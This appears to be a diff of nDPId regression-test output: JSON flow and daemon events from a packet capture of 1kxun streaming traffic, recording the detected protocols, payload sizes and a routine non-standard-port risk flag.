-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1654385229374,"flow_last_seen":1654385236412,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8604,"flow_avg_l4_payload_len":537,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"52.29.177.177","src_port":37100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1654385136215,"flow_last_seen":1654385137803,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":264022,"flow_avg_l4_payload_len":7333,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385128878,"flow_last_seen":1654385130178,"flow_idle_time":7580000,"flow_min_l4_payload_len":496,"flow_max_l4_payload_len":2746,"flow_tot_l4_payload_len":4982,"flow_avg_l4_payload_len":1245,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1654385136216,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":37440,"flow_tot_l4_payload_len":124465,"flow_avg_l4_payload_len":8890,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385128878,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"flow_min_l4_payload_len":817,"flow_max_l4_payload_len":871,"flow_tot_l4_payload_len":1688,"flow_avg_l4_payload_len":844,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385129449,"flow_last_seen":1654385129804,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":916,"flow_tot_l4_payload_len":1181,"flow_avg_l4_payload_len":590,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":47272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":80,"flow_first_seen":1654385140171,"flow_last_seen":1654385145302,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":8640,"flow_tot_l4_payload_len":177845,"flow_avg_l4_payload_len":2223,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45380,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385139579,"flow_last_seen":1654385139941,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1384,"flow_avg_l4_payload_len":692,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"103.29.71.30","src_port":35200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","packets-captured":2549,"packets-processed":2549,"total-skipped-flows":0,"total-l4-payload-len":4952452,"total-not-detected-flows":14,"total-guessed-flows":6,"total-detected-flows":177,"total-detection-updates":22,"total-updates":0,"current-active-flows":0,"total-active-flows":197,"total-idle-flows":197,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1083,"global_ts_msec":1654385236487} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385184174,"flow_last_seen":1654385184282,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":1374,"flow_avg_l4_payload_len":687,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156962,"flow_last_seen":1654385157145,"flow_idle_time":7580000,"flow_min_l4_payload_len":682,"flow_max_l4_payload_len":1112,"flow_tot_l4_payload_len":1794,"flow_avg_l4_payload_len":897,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50140,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156971,"flow_last_seen":1654385157153,"flow_idle_time":7580000,"flow_min_l4_payload_len":766,"flow_max_l4_payload_len":1114,"flow_tot_l4_payload_len":1880,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156978,"flow_last_seen":1654385157162,"flow_idle_time":7580000,"flow_min_l4_payload_len":508,"flow_max_l4_payload_len":1118,"flow_tot_l4_payload_len":1626,"flow_avg_l4_payload_len":813,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385156997,"flow_last_seen":1654385157178,"flow_idle_time":7580000,"flow_min_l4_payload_len":680,"flow_max_l4_payload_len":1113,"flow_tot_l4_payload_len":1793,"flow_avg_l4_payload_len":896,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385157001,"flow_last_seen":1654385157186,"flow_idle_time":7580000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":1023,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":50176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385141046,"flow_last_seen":1654385141076,"flow_idle_time":7580000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":2351,"flow_avg_l4_payload_len":587,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.37","src_port":41390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385235892,"flow_last_seen":1654385236487,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1663,"flow_avg_l4_payload_len":831,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1654385143337,"flow_last_seen":1654385143386,"flow_idle_time":7580000,"flow_min_l4_payload_len":421,"flow_max_l4_payload_len":2836,"flow_tot_l4_payload_len":20884,"flow_avg_l4_payload_len":1898,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"142.250.186.174","src_port":36732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Advertisement"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385232006,"flow_last_seen":1654385232057,"flow_idle_time":7580000,"flow_min_l4_payload_len":559,"flow_max_l4_payload_len":668,"flow_tot_l4_payload_len":1227,"flow_avg_l4_payload_len":613,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.217.16.142","src_port":53416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1654385229375,"flow_last_seen":1654385231942,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3139,"flow_avg_l4_payload_len":523,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385229377,"flow_last_seen":1654385229406,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1728,"flow_avg_l4_payload_len":432,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"35.156.44.13","src_port":42566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1654385232040,"flow_last_seen":1654385234239,"flow_idle_time":7580000,"flow_min_l4_payload_len":598,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":3050,"flow_avg_l4_payload_len":762,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183491,"flow_last_seen":1654385183514,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":810,"flow_tot_l4_payload_len":1204,"flow_avg_l4_payload_len":602,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56094,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183496,"flow_last_seen":1654385183520,"flow_idle_time":7580000,"flow_min_l4_payload_len":791,"flow_max_l4_payload_len":1640,"flow_tot_l4_payload_len":2431,"flow_avg_l4_payload_len":1215,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183495,"flow_last_seen":1654385183517,"flow_idle_time":7580000,"flow_min_l4_payload_len":394,"flow_max_l4_payload_len":797,"flow_tot_l4_payload_len":1191,"flow_avg_l4_payload_len":595,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385183618,"flow_last_seen":1654385183642,"flow_idle_time":7580000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":1485,"flow_avg_l4_payload_len":742,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385127293,"flow_last_seen":1654385127488,"flow_idle_time":7580000,"flow_min_l4_payload_len":270,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":734,"flow_avg_l4_payload_len":367,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"129.226.107.77","src_port":41134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119050,"flow_last_seen":1654385119358,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60962,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385119973,"flow_last_seen":1654385120216,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60972,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385120896,"flow_last_seen":1654385121164,"flow_idle_time":7580000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":727,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.104.93.92","src_port":60984,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1654385232158,"flow_last_seen":1654385232180,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2540,"flow_avg_l4_payload_len":508,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385229378,"flow_last_seen":1654385229413,"flow_idle_time":7580000,"flow_min_l4_payload_len":353,"flow_max_l4_payload_len":1249,"flow_tot_l4_payload_len":1602,"flow_avg_l4_payload_len":801,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.50","src_port":41940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1654385131029,"flow_last_seen":1654385180912,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":635658,"flow_avg_l4_payload_len":5996,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":60148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1654385181857,"flow_last_seen":1654385181897,"flow_idle_time":7580000,"flow_min_l4_payload_len":409,"flow_max_l4_payload_len":983,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":696,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"104.117.221.10","src_port":59324,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1654385129508,"flow_last_seen":1654385129813,"flow_idle_time":7580000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":627,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"119.45.78.184","src_port":38834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"}} 
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1654385184927,"flow_last_seen":1654385185032,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":8568,"flow_tot_l4_payload_len":239007,"flow_avg_l4_payload_len":3918,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1654385136207,"flow_last_seen":1654385137795,"flow_idle_time":7580000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":21600,"flow_tot_l4_payload_len":179965,"flow_avg_l4_payload_len":5141,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"finished","flow_packets_processed":82,"flow_first_seen":1654385136206,"flow_last_seen":1654385180918,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":23040,"flow_tot_l4_payload_len":523278,"flow_avg_l4_payload_len":6381,"midstream":1,"thread_ts_msec":1654385236487,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"172.105.121.82","src_port":46184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
